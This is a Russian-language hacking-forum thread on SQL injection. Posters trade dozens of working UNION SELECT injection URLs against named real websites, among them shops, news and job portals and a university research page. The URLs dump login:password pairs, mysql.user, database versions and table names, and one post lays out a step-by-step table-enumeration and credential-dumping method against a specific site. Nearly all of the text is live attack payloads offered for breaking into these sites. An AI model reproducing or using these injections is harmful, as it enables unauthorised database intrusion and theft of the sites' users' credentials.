SQL Инъекции

там есть таблица user, но из неё не извлекается. Второй подобный сайт уже вижу =(

 

__http://www.shopcom.ru/shop.php?param=comment&a=1&id_shop=-1+union+select+1,2,3,name,mail,password,7,8,9,10,11+from+shop/*

 

таблица есть, но она просто пустаю...возможно есть какая то другая...у меня такое было...user пустая, зато siteuser с пользователями.

 

2Spyder
SELECT count(*) from users

 

http://gamemag.ru/?act=showart&id=-947+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*

http://www.rba.ru/news/vid_news.php?id=-323+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*

http://www.trubka.net/showsoft.php?id=-1112+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://nextaz.com/showsoft.php?id=-5062+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.neftegaz.ru/kadr/viewvac.php?id=-21497+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*

http://www.mnl.ru/viewvac.php?id_vakansiya=-27770+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

http://www.joblive.ru/viewvac.php?id=-51229203+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

http://www.elit-dom.com/podrobnee.php?id=-103+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.iriscom.ru/index.php?page_id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.sdbireras.ru/product_detail.php?id=30&tip=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/*

http://www.cz-usa.com/product_detail.php?id=-28+union+select+1,2,3,4,5,6/*

http://www.internaltool.com/products/product_detail.php?series=-81+union+select+1,2/*

http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

http://sportsoptics.pl/product_detail.php?group=scopes&id=-473+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*

 

2 злюка
таблица не пустая. Когда пробуешь извлечь что либо оттуда появляется ошибка. Если бы она была пустая, то просто ничего не выводилось бы =)
http://research.udmercy.edu/ids/technoclass.php?id=-6+union+select+1,2,column_name,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='user'
2 [ cash ]
не вкурил немного =) появляется ошибкаю или может я что то не так делаю?

 

1) смотрим таблицы

Code:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,table_name,3,4,5,6+from+INFORMATION_SCHEMA.TABLES/*

2)Смотрим кол-во в нужных таблицах.

Code:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+enroll_accounts/*

Code:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+accounts/*

Code:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+user/*

3)Выводим данные.

Code:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,concat(username,char(58),password),3,4,5,6+from+accounts/*

что тебя заинтересует я не знаю дальшейших методов взлома много дальше разбирайся сам.

in sql i trust )))​

 

Дык я это знаю, не совсем уж ламер =) Просто count(*) from users выводит ошибку, а должна выводится по идее пустая страница

 

=\

 

__http://baby.com.ua/hit/school/obj_view_otziv.php3?p=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

 

надо внести свой вклад
http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+1,2,version(),4,user()/*

 

байан нитрокс

 

"за что ни возьмешься"... я ее сам нашел, честно
ладно, будем копать дальше.. странно, я сёарчем не нашел этот урл(
sorry 4 offtop =\

 

__http://obec.org.ru/author.php?sort=CommentsThread&sort_type=ASC&pos=0&Id=-1+union+select+1,user(),3,4,5,6,7,8/*

 

юзай limit,char и будет тебе счастье

 

И вот этот сайт меня зарадовал:

 

2 _Pantera_
не правда. иногда используя INFORMATION_SCHEMA выводится только одна таблица и тогда надо использовать LIMIT
Но здесь почему то не работает

 

Code:

http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15+from+INFORMATION_SCHEMA.TABLES+limit+1,666/*

и там по страничкам полистаешь, ог?

 

Code:

http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20/*
http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pwd),12,13,14,15,16,17,18,19,20+from+lnkxchange_admins/*

 

=)